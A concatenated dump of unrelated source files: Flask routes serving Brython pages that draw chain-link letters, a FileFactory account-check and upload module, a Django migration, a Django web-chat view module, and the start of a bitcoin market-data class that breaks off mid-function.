"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-315, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="blue")
cgo.setWorldCoords(-385, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="red")
cgo.setWorldCoords(-445, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
</script>
</body></html>
'''
return outstring
@bg11_40323247.route('/task47_2')
def task47_2():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-40, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 B
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 右上垂直向下單元
x7, y7 = mychain.basic_rot(x6, y6, -90)
# 右斜 240 度
x8, y8 = mychain.basic_rot(x7, y7, 210)
# 中間水平
mychain.basic(x8, y8, x2, y2)
# 右下斜 -30 度
x10, y10 = mychain.basic_rot(x8, y8, -30)
# 右下垂直向下單元
x11, y11 = mychain.basic_rot(x10, y10, -90)
# 右下斜 240 度
x12, y12 = mychain.basic_rot(x11, y11, 210)
# 水平接回起點
mychain.basic(x12,y12, 0, 0, color="green")
cgo.setWorldCoords(-107.5, -250, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-50, -250, 500, 500)
# 畫 C
# 上半部
# 左邊中間垂直起點, 圓心位於線段中央, y 方向再向上平移兩個鏈條圓心距單位
x1, y1 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), 90)
# 上方轉 80 度
x2, y2 = mychain.basic_rot(x1, y1, 80)
# 上方轉 30 度
x3, y3 = mychain.basic_rot(x2, y2, 30)
# 上方水平
x4, y4 = mychain.basic_rot(x3, y3, 0)
# 下半部, 從起點開始 -80 度
x5, y5 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), -80)
# 下斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 下方水平單元
x7, y7 = mychain.basic_rot(x6, y6, -0, color="green")
cgo.setWorldCoords(-55, -250, 500, 500)
# 畫 D
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0+65*3, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -40 度
x6, y6 = mychain.basic_rot(x5, y5, -40)
x7, y7 = mychain.basic_rot(x6, y6, -60)
# 右中垂直向下單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
# -120 度
x9, y9 = mychain.basic_rot(x8, y8, -120)
# -140
x10, y10 = mychain.basic_rot(x9, y9, -140)
# 水平接回原點
mychain.basic(x10, y10, 0+65*3, 0, color="green")
</script>
</body></html>
'''
return outstring
@bg11_40323247.route('/task47_3')
def task47_3():
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>網際 2D 繪圖</title>
<!-- IE 9: display inline SVG -->
<meta http-equiv="X-UA-Compatible" content="IE=9">
<script type="text/javascript" src="http://brython.info/src/brython_dist.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango-8v03.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/Cango2D-6v13.js"></script>
<script type="text/javascript" src="http://cptocadp-2015fallhw.rhcloud.com/static/CangoAxes-1v33.js"></script>
</head>
<body>
<script>
window.onload=function(){
brython(1);
}
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
<script type="text/python">
from javascript import JSConstructor
from browser import alert
from browser import window
import math
cango = JSConstructor(window.Cango)
cobj = JSConstructor(window.Cobj)
shapedefs = window.shapeDefs
obj2d = JSConstructor(window.Obj2D)
cgo = cango("plotarea")
cgo.setWorldCoords(-250, -250, 500, 500)
# 畫軸線
cgo.drawAxes(0, 240, 0, 240, {
"strokeColor":"#aaaaaa",
"fillColor": "#aaaaaa",
"xTickInterval": 20,
"xLabelInterval": 20,
"yTickInterval": 20,
"yLabelInterval": 20})
deg = math.pi/180
# 將繪製鏈條輪廓的內容寫成 class 物件
class chain():
# 輪廓的外型設為成員變數
chamber = "M -6.8397, -1.4894 \
A 7, 7, 0, 1, 0, 6.8397, -1.4894 \
A 40, 40, 0, 0, 1, 6.8397, -18.511 \
A 7, 7, 0, 1, 0, -6.8397, -18.511 \
A 40, 40, 0, 0, 1, -6.8397, -1.4894 z"
cgoChamber = window.svgToCgoSVG(chamber)
# 利用鏈條起點與終點定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic(self, x1, y1, x2, y2, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(math.atan2(y2-y1, x2-x1)/deg+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
# 利用鏈條起點與旋轉角度定義繪圖, 使用內定的 color, border 與 linewidth 變數
def basic_rot(self, x1, y1, rot, color="green", border=True, linewidth=4, scale=1):
self.x1 = x1
self.y1 = y1
self.rot = rot
self.color = color
self.border = border
self.linewidth = linewidth
self.scale = scale
# 注意, cgo.Chamber 為成員變數
cmbr = cobj(self.cgoChamber, "SHAPE", {
"fillColor": color,
"border": border,
"strokeColor": "tan",
"lineWidth": linewidth })
# hole 為原點位置
hole = cobj(shapedefs.circle(4), "PATH")
cmbr.appendPath(hole)
# 根據旋轉角度, 計算 x2 與 y2
x2 = x1 + 20*math.cos(rot*deg)
y2 = y1 + 20*math.sin(rot*deg)
# 複製 cmbr, 然後命名為 basic1
basic1 = cmbr.dup()
# 因為鏈條的角度由原點向下垂直, 所以必須轉 90 度, 再考量 atan2 的轉角
basic1.rotate(rot+90)
# 放大 scale 倍
cgo.render(basic1, x1, y1, scale, 0)
return x2, y2
# 利用 chain class 建立案例, 對應到 mychain 變數
mychain = chain()
# 畫 B
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 右上垂直向下單元
x7, y7 = mychain.basic_rot(x6, y6, -90)
# 右斜 240 度
x8, y8 = mychain.basic_rot(x7, y7, 210)
# 中間水平
mychain.basic(x8, y8, x2, y2)
# 右下斜 -30 度
x10, y10 = mychain.basic_rot(x8, y8, -30)
# 右下垂直向下單元
x11, y11 = mychain.basic_rot(x10, y10, -90)
# 右下斜 240 度
x12, y12 = mychain.basic_rot(x11, y11, 210)
# 水平接回起點
mychain.basic(x12,y12, 0, 0, color="green")
cgo.setWorldCoords(-247.5, -350, 500, 500)
# 畫 A
# 左邊兩個垂直單元
x1, y1 = mychain.basic_rot(0, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
# 左斜邊兩個單元
x3, y3 = mychain.basic_rot(x2, y2, 80)
x4, y4 = mychain.basic_rot(x3, y3, 71)
# 最上方水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜邊兩個單元
x6, y6 = mychain.basic_rot(x5, y5, -71)
x7, y7 = mychain.basic_rot(x6, y6, -80)
# 右邊兩個垂直單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
x9, y9 = mychain.basic_rot(x8, y8, -90)
# 中間兩個水平單元
x10, y10 = mychain.basic_rot(x8, y8, -180)
mychain.basic(x10, y10, x1, y1, color="green")
cgo.setWorldCoords(-55, -50, 500, 500)
# 畫 D
# 左邊四個垂直單元
x1, y1 = mychain.basic_rot(0+65*3, 0, 90)
x2, y2 = mychain.basic_rot(x1, y1, 90)
x3, y3 = mychain.basic_rot(x2, y2, 90)
x4, y4 = mychain.basic_rot(x3, y3, 90)
# 上方一個水平單元
x5, y5 = mychain.basic_rot(x4, y4, 0)
# 右斜 -40 度
x6, y6 = mychain.basic_rot(x5, y5, -40)
x7, y7 = mychain.basic_rot(x6, y6, -60)
# 右中垂直向下單元
x8, y8 = mychain.basic_rot(x7, y7, -90)
# -120 度
x9, y9 = mychain.basic_rot(x8, y8, -120)
# -140
x10, y10 = mychain.basic_rot(x9, y9, -140)
# 水平接回原點
mychain.basic(x10, y10, 0+65*3, 0, color="green")
cgo.setWorldCoords(-120, -150, 500, 500)
# 畫 C
# 上半部
# 左邊中間垂直起點, 圓心位於線段中央, y 方向再向上平移兩個鏈條圓心距單位
x1, y1 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), 90)
# 上方轉 80 度
x2, y2 = mychain.basic_rot(x1, y1, 80)
# 上方轉 30 度
x3, y3 = mychain.basic_rot(x2, y2, 30)
# 上方水平
x4, y4 = mychain.basic_rot(x3, y3, 0)
# 下半部, 從起點開始 -80 度
x5, y5 = mychain.basic_rot(0+65*2, -10+10+20*math.sin(80*deg)+20*math.sin(30*deg), -80)
# 下斜 -30 度
x6, y6 = mychain.basic_rot(x5, y5, -30)
# 下方水平單元
x7, y7 = mychain.basic_rot(x6, y6, -0, color="green")
</script>
</body></html>
'''
return outstring
| agpl-3.0 | -2,091,752,563,251,680,500 | 27.446708 | 110 | 0.607912 | false |
oczkers/gdown | gdown/modules/filefactory.py | 1 | 5668 | # -*- coding: utf-8 -*-
"""
gdown.modules.filefactory
~~~~~~~~~~~~~~~~~~~
This module contains handlers for filefactory.
"""
import re
from datetime import datetime
from dateutil import parser
from time import sleep
from ..module import browser, acc_info_template
from ..exceptions import ModuleError
def upload(username, passwd, filename):
"""Returns uploaded file url."""
r = browser()
r.post('http://www.filefactory.com/member/signin.php', {'loginEmail': username, 'loginPassword': passwd, 'Submit': 'Sign In'}) # login to get ff_membership cookie
# host = r.get('http://www.filefactory.com/servers.php?single=1').text # get best server to upload
host = 'http://upload.filefactory.com/upload.php' # always returning the same url (?)
viewhash = re.search('<viewhash>(.+)</viewhash>', r.get('http://www.filefactory.com/upload/upload_flash_begin.php?files=1').text).group(1) # get viewhash
r.post('%s/upload_flash.php?viewhash=%s' % (host, viewhash), {'Filename': filename, 'Upload': 'Submit Query'}, files={'file': open(filename, 'rb')}).text # upload
return 'http://www.filefactory.com/file/%s/n/%s' % (viewhash, filename)
def accInfo(username, passwd, date_birth=False, proxy=False):
"""Returns account info."""
acc_info = acc_info_template()
r = browser(proxy)
data = {'loginEmail': username,
'loginPassword': passwd,
'Submit': 'Sign In'}
content = r.post('https://www.filefactory.com/member/signin.php', data=data).text
open('gdown.log', 'w').write(content)
# TODO: language
if r.cookies['locale'] != 'en_US.utf8':
print('language changing to en')
data = {'func': 'locale',
# 'redirect': '/account/',
'settingsLanguage': 'en_US.utf8',
'Submit': ''}
content = r.post('http://filefactory.com/account/index.php', data=data).text
open('gdown1.log', 'w').write(content)
if 'What is your date of birth?' in content:
if not date_birth:
# raise ModuleError('Birth date not set.')
acc_info['status'] = 'free'
return acc_info
print('date birth',) # DEBUG
content = r.post('https://www.filefactory.com/member/setdob.php', {'newDobMonth': '1', 'newDobDay': '1', 'newDobYear': '1970', 'Submit': 'Continue'}).text
open('gdown.log', 'w').write(content)
if 'Please Update your Password' in content:
if not date_birth:
# raise ModuleError('Password has to be updated.')
acc_info['status'] = 'free'
return acc_info
print('password resetting',) # DEBUG
content = r.post('https://www.filefactory.com/member/setpwd.php', {'dobMonth': '1', 'dobDay': '1', 'dobYear': '1970', 'newPassword': passwd, 'Submit': 'Continue'}).text
open('gdown.log', 'w').write(content)
if 'Your Date of Birth was incorrect.' in content:
print('wrong date birth',) # DEBUG
acc_info['status'] = 'free'
return acc_info
elif 'You have been signed out of your account due to a change being made to one of your core account settings. Please sign in again.' in content or 'Your password has been changed successfully' in content:
print('relogging after password reset',) # DEBUG
sleep(5)
return accInfo(username, passwd)
if 'Review Acceptable Use Policy' in content: # new policy
print('new policy')
content = r.post('https://www.filefactory.com/member/settos.php', data={'agree': '1', 'Submit': 'I understand'}).text()
if 'Account Pending Deletion' in content or 'The Email Address submitted was invalid' in content or 'The email address or password you have entered is incorrect.' in content:
acc_info['status'] = 'deleted'
return acc_info
elif 'Too Many Failed Sign In Attempts' in content:
# raise ModuleError('ip banned')
# print('ip banned') # DEBUG
sleep(30)
return accInfo(username=username, passwd=passwd, proxy=proxy)
content = r.get('https://www.filefactory.com/account/').text
if '<strong>Free Member</strong>' in content or '<strong>Kostenloses Mitglied</strong>' in content or '<strong>Membro Gratuito</strong>' in content:
acc_info['status'] = 'free'
return acc_info
elif any(i in content for i in ('The account you are trying to use has been deleted.', 'This account has been automatically suspended due to account sharing.', 'The account you have tried to sign into is pending deletion.', 'Your FileFactory Account Has Been Temporarily Suspended')):
acc_info['status'] = 'blocked'
return acc_info
elif any(i in content for i in ('The email or password you have entered is incorrect', 'The email or password wre invalid. Please try again.', 'The Email Address submitted was invalid', 'The email address or password you have entered is incorrect.')):
acc_info['status'] = 'deleted'
return acc_info
elif 'title="Premium valid until:' in content:
acc_info['status'] = 'premium'
acc_info['expire_date'] = parser.parse(re.search('title="Premium valid until: <strong>(.+?)</strong>">', content).group(1))
return acc_info
elif "Congratulations! You're a FileFactory Lifetime member. We value your loyalty and support." in content or '<strong>Lifetime</strong>' in content:
acc_info['status'] = 'premium'
acc_info['expire_date'] = datetime.max
return acc_info
else:
open('gdown.log', 'w').write(content)
raise ModuleError('Unknown error, full log in gdown.log')
| gpl-3.0 | -7,907,263,448,037,048,000 | 50.063063 | 288 | 0.638497 | false |
parksandwildlife/wastd | occurrence/migrations/0034_auto_20190507_1222.py | 1 | 2843 | # Generated by Django 2.1.7 on 2019-05-07 04:22
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('occurrence', '0033_auto_20190506_1347'),
]
operations = [
migrations.CreateModel(
name='AnimalSex',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.SlugField(help_text='A unique, url-safe code.', max_length=500, unique=True, verbose_name='Code')),
('label', models.CharField(blank=True, help_text='A human-readable, self-explanatory label.', max_length=500, null=True, verbose_name='Label')),
('description', models.TextField(blank=True, help_text='A comprehensive description.', null=True, verbose_name='Description')),
],
options={
'ordering': ['code'],
'abstract': False,
},
),
migrations.AlterModelOptions(
name='animalobservation',
options={'verbose_name': 'Animal Observation', 'verbose_name_plural': 'Animal Observations'},
),
migrations.AlterModelOptions(
name='habitatcomposition',
options={'verbose_name': 'Habitat Composition', 'verbose_name_plural': 'Habitat Compositions'},
),
migrations.AlterModelOptions(
name='habitatcondition',
options={'verbose_name': 'Habitat Condition', 'verbose_name_plural': 'Habitat Conditions'},
),
migrations.AlterModelOptions(
name='physicalsample',
options={'verbose_name': 'Physical Sample', 'verbose_name_plural': 'Physical Samples'},
),
migrations.AlterModelOptions(
name='plantcount',
options={'verbose_name': 'Plant Count', 'verbose_name_plural': 'Plant Counts'},
),
migrations.AlterModelOptions(
name='vegetationclassification',
options={'verbose_name': 'Vegetation Classification', 'verbose_name_plural': 'Vegetation Classifications'},
),
migrations.AlterField(
model_name='areaencounter',
name='source_id',
field=models.CharField(default=uuid.UUID('b6e9dd1a-707f-11e9-a870-ecf4bb19b5fc'), help_text='The ID of the record in the original source, if available.', max_length=1000, verbose_name='Source ID'),
),
migrations.AddField(
model_name='animalobservation',
name='sex',
field=models.ForeignKey(blank=True, help_text='The sex of the primary observed animal.', null=True, on_delete=django.db.models.deletion.CASCADE, to='occurrence.AnimalSex', verbose_name='Animal Sex'),
),
]
| mit | 1,233,837,931,145,389,300 | 44.854839 | 211 | 0.610623 | false |
willre/homework | day21-22/webChat/webChat_master/views.py | 1 | 3580 | # -*- coding:utf-8 -*-
import json
import Queue
import time
from django.shortcuts import render,HttpResponseRedirect,HttpResponse
from django.contrib.auth import authenticate,login,logout
from webChat_forms.loginFrom import userLoginFrom
from django.contrib.auth.decorators import login_required
from webChat_models import models
# Create your views here.
GLOBAL_MQ = {}
def indexPage(request):
loginFrom = userLoginFrom()
return render(request,"index.html",{"loginFrom":loginFrom})
@login_required
def chatPage(request):
return render(request,"chat.html")
def loadContacts(request):
contact_dic = {}
url_path = request.path
print url_path,"asd"
contact_dic["single"] = list(request.user.userprofile.friends.select_related().values("id","name","description"))
contact_dic["group"] = list(request.user.userprofile.user_group_set.select_related().values("id","name","description"))
print json.dumps( contact_dic)
return HttpResponse(json.dumps(contact_dic))
def new_msg(request):
# 用户向server 提交数据
if request.method=="POST":
data = json.loads(request.POST.get('data'))
send_to_user_id = data['to']
local_time = time.strftime("%Y-%m-%d %X",time.localtime(time.time()))
data['timestamp'] = local_time #设置时间戳
print data
if data["contact_type"] == "group":
group_obj = models.User_Group.objects.get(id=send_to_user_id)
for member in group_obj.members.select_related():
print member.id,data["from"]
if str(member.id) not in GLOBAL_MQ:
GLOBAL_MQ[str(member.id)] = Queue.Queue()
if str(member.id) != data["from"]:
GLOBAL_MQ[str(member.id)].put(data)
else:
if send_to_user_id not in GLOBAL_MQ:
GLOBAL_MQ[send_to_user_id] = Queue.Queue()
print "POST",send_to_user_id,data
GLOBAL_MQ[send_to_user_id].put(data)
return HttpResponse(local_time)
# 用户向server 请求数据
if request.method=="GET":
request_user_id = str(request.user.userprofile.id)
msg_lists = []
if request_user_id in GLOBAL_MQ:
stored_msg_nums = GLOBAL_MQ[request_user_id].qsize()
if stored_msg_nums ==0: #no new msgs
try:
msg = GLOBAL_MQ[request_user_id].get(timeout=15)
msg_lists.append(msg)
# msg_lists.append(GLOBAL_MQ[request_user_id].get(timeout=15))
except Exception as e:
print("err:",e)
for i in range(stored_msg_nums):
msg_lists.append(GLOBAL_MQ[request_user_id].get())
else:
GLOBAL_MQ[str(request.user.userprofile.id)] = Queue.Queue()
print "GETMsg",msg_lists
return HttpResponse(json.dumps(msg_lists))
def userLogin(request):
loginFrom = userLoginFrom()
print(request.POST)
err_msg =''
if request.method == "POST":
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username,password=password)
if user is not None:
login(request,user)
return HttpResponseRedirect('/chat/#contacts')
else:
err_msg = "Wrong username or password!"
return render(request,'index.html',{"loginFrom":loginFrom,'err_msg':err_msg})
def userLogout(request):
logout(request)
return HttpResponseRedirect('/')
| gpl-2.0 | 4,381,744,721,565,426,700 | 30.90991 | 123 | 0.612931 | false |
taariq/btcmarketdata | btcdata/public_markets/market.py | 1 | 1991 | import time
import urllib.request
import urllib.error
import urllib.parse
import config
import logging
from fiatconverter import FiatConverter
class Market(object):
def __init__(self, currency):
self.name = self.__class__.__name__
self.currency = currency
self.depth_updated = 0
self.update_rate = 60
self.fc = FiatConverter()
self.fc.update()
def get_depth(self):
timediff = time.time() - self.depth_updated
if timediff > self.update_rate:
self.ask_update_depth()
timediff = time.time() - self.depth_updated
if timediff > config.market_expiration_time:
logging.warn('Market: %s order book is expired' % self.name)
self.depth = {'asks': [{'price': 0, 'amount': 0}], 'bids': [
{'price': 0, 'amount': 0}]}
return self.depth
def convert_to_usd(self):
if self.currency == "USD":
return
for direction in ("asks", "bids"):
for order in self.depth[direction]:
order["price"] = self.fc.convert(order["price"], self.currency, "USD")
def ask_update_depth(self):
try:
self.update_depth()
self.convert_to_usd()
self.depth_updated = time.time()
except (urllib.error.HTTPError, urllib.error.URLError) as e:
logging.error("HTTPError, can't update market: %s - %s" % (self.name, str(e)))
except Exception as e:
logging.error("Can't update market: %s - %s" % (self.name, str(e)))
def get_ticker(self):
depth = self.get_depth()
res = {'ask': 0, 'bid': 0}
